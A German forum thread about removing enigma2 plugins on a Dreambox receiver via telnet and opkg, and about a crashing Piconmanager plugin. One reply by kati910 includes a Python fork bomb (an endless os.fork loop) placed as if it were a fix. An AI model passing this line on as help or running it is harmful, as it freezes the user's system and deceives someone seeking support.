Plugins entfernen geht nicht!

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Plugins entfernen geht nicht!

      hi,

      ich habe einige plugins installiert die ich wieder löschen will da ich nur noch ca.26 mb flash verfügbar habe, aber es geht nicht es erscheint die meldung (no new plugins found)
      benötige hilfe!

      und wie kann ich plugins auf die festplatte installieren habe eine 320gb festplatte eingebaut.

      thx schon mal im voraus
    • RE: Plugins entfernen geht nicht!

      Schaue mal mit Telnet auf der Box

      opkg list-installed .....
      dann kommt zb:

      enigma2-plugin-extensions-mytube - experimental-cvs20100126-r0

      dann kannst Du versuchen mit

      opkg remove enigma2-plugin-extensions-mytube

      das plugins zu entfernen


      Haste auch die Picons im flash ?

      Die kannste auslagern ... dann aber lieber auf einen USB-Stick ..
      nicht auf die Festplatte ... (laeuft dann dauernd)
      Why drink & Drive ?

      When you can smoke & fly 8)

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von dreamedge ()

    • wo ist telnet ? sorry das ich so blöd frage aber hab die ganze box durchschaut und nichts gefunden :)

      ich habe ddc auf dem pc damit kann ich auf die box zugreifen, falls telnet das gleiche macht.

      und wie geht das mit dem auslagern brauche ich barry allen dafür?

      thx

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von pjam3110 ()

    • Wenn no new plugins found kommt handelt es sich um den installer von dmm der geht nicht den muss dmm erst mal fixen.
      Mach es so wie Sp3ct0r es beschrieben hatt.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von kati910
      Wenn no new plugins found kommt handelt es sich um den installer von dmm der geht nicht den muss dmm erst mal fixen.
      Mach es so wie Sp3ct0r es beschrieben hatt.


      Wenn das " no new plugins found" erscheint kann das auch daran liegen das eine langsame DSL Verbindung von mehreren Internet Anwendungen gleichzeitig benutzt wird. Daher wenn möglich alle anderen Verbindungen außer dem Dreambox Update bzw. Plugin Update trennen.

      BisDenneDann
    • Original von I-Revue
      Original von kati910
      Wenn no new plugins found kommt handelt es sich um den installer von dmm der geht nicht den muss dmm erst mal fixen.
      Mach es so wie Sp3ct0r es beschrieben hatt.


      Wenn das " no new plugins found" erscheint kann das auch daran liegen das eine langsame DSL Verbindung von mehreren Internet Anwendungen gleichzeitig benutzt wird. Daher wenn möglich alle anderen Verbindungen außer dem Dreambox Update bzw. Plugin Update trennen.

      BisDenneDann



      das entfernen von plugins aus den erweiterungen hat dmm doch enfernt o0
    • Original von _pustekuchen_
      Hallo

      Möchte das Audio Sync Plugin entfernen.

      Es kommt immer 0 Pakete entfernt mit 1 Fehler.

      Was nun?


      tjo dann brauch irgend ein anderes plugin das Audio Sync Plugin 8)
      » time to say goodbye «

      Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • Hallo zusammen,

      Habe auf meiner dm8000 den Piconmanager - enigma2-plugin-extensions-piconmanager_2.2-20150329-r0_all.ipk - mit Telnet installiert, kann ihn dann auch nach dem Neustart anwählen.
      Erhalte dann aber den GS.

      Ich will nun das plugin, da es nicht läuft, deinstallieren mit telnet und dem Befehl "opkg remove enigma2-plugin-extensions-piconmanager_2.2-20150329-r0_all.ipk" , es wird aber nicht gefunden.

      mein Image: newnigma2-ipk-weekly-dm8000-12_10_2018.nfi



      Danke
    • Hilfsbereit schrieb:

      ... poste doch einfach mal das crashlog hier, welches du unter /media/hdd findest.
      anbei das crashlog, ich kann damit allerdigs nichts anfangen, sorry

      habe auch noch vom vorherigen Probieren die plugins picon und piconloader installiert, kann das das Problem sein?

      @Joey: habe mit dem Befehl von Dir deinstalliert und damit auch neu installiert, leider weiter GS...
      Dateien
    • Hilfsbereit schrieb:

      Hast du nach der Installation auch einen GUI Neustart ausgeführt?
      Hab ich, gerade nochmals die De- und Installation durchgeführt, danach GUI neu gestartet, wieder GS

      Telnet script in der Anlage

      Liegt der Piconmanager wirklich auf dem feed, habe ich gar nicht gesehen...
      Bilder
      • script.jpg

        122,8 kB, 824×204, 286 mal angesehen